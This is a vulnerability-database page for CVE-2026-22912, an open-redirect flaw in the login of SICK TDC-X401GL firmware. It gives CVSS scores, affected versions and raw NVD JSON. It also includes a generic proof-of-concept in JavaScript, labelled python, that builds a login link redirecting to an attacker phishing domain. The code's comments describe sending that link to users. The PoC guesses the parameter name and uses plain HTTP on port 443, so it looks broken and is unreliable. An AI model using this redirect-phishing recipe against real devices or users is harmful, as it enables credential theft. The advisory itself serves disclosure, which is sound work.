Security Vulnerability Report
中文
CVE-2026-22912 CVSS 4.3 MEDIUM

CVE-2026-22912

Published: 2026-01-15 13:16:06
Last Modified: 2026-01-23 15:33:28
Source: [email protected]

Description

Improper validation of a login parameter may allow attackers to redirect users to malicious websites after authentication. This can lead to various risk including stealing credentials from unsuspecting users.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK产品受影响的特定版本(需参考官方SCA-2026-0001公告确认具体版本列表)
建议查看https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json获取详细版本信息

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-22912 Open Redirect PoC // Target: SICK products with improper login parameter validation const http = require('http'); // Malicious redirect URL controlled by attacker const maliciousUrl = 'https://attacker-controlled-site.com/phishing'; // Construct the malicious login URL const targetHost = 'vulnerable-sick-device.local'; const targetPort = 443; // The vulnerable endpoint typically accepts redirect parameters const maliciousPath = `/login?redirect=${encodeURIComponent(maliciousUrl)}`; console.log('[*] CVE-2026-22912 Open Redirect PoC'); console.log(`[*] Target: ${targetHost}`); console.log(`[*] Malicious redirect URL: ${maliciousUrl}`); console.log(`[*] Constructed URL: https://${targetHost}${maliciousPath}`); // Simulate the attack request const options = { hostname: targetHost, port: targetPort, path: maliciousPath, method: 'GET', headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': 'text/html,application/xhtml+xml' } }; const req = http.request(options, (res) => { console.log(`[+] Response Status: ${res.statusCode}`); console.log(`[+] Location Header: ${res.headers.location}`); // Check if redirect occurs to malicious URL if (res.headers.location && res.headers.location.includes(maliciousUrl)) { console.log('[!] VULNERABLE: Open redirect confirmed!'); console.log('[!] User will be redirected to attacker-controlled site'); } }); req.on('error', (e) => { console.error(`[-] Error: ${e.message}`); }); req.end(); /* Usage: 1. Replace 'vulnerable-sick-device.local' with actual target 2. Replace 'attacker-controlled-site.com' with your controlled domain 3. Send the link to authenticated user 4. After login, user will be redirected to phishing site Note: This PoC is for authorized security testing only. */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22912", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:05.960", "lastModified": "2026-01-23T15:33:27.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper validation of a login parameter may allow attackers to redirect users to malicious websites after authentication. This can lead to various risk including stealing credentials from unsuspecting users."}, {"lang": "es", "value": "Validación incorrecta de un parámetro de inicio de sesión puede permitir a los atacantes redirigir a los usuarios a sitios web maliciosos después de la autenticación. Esto puede llevar a varios riesgos, incluyendo el robo de credenciales de usuarios desprevenidos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "74DEFD78-EEE6-41B4-8E38-E6C5081206D0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.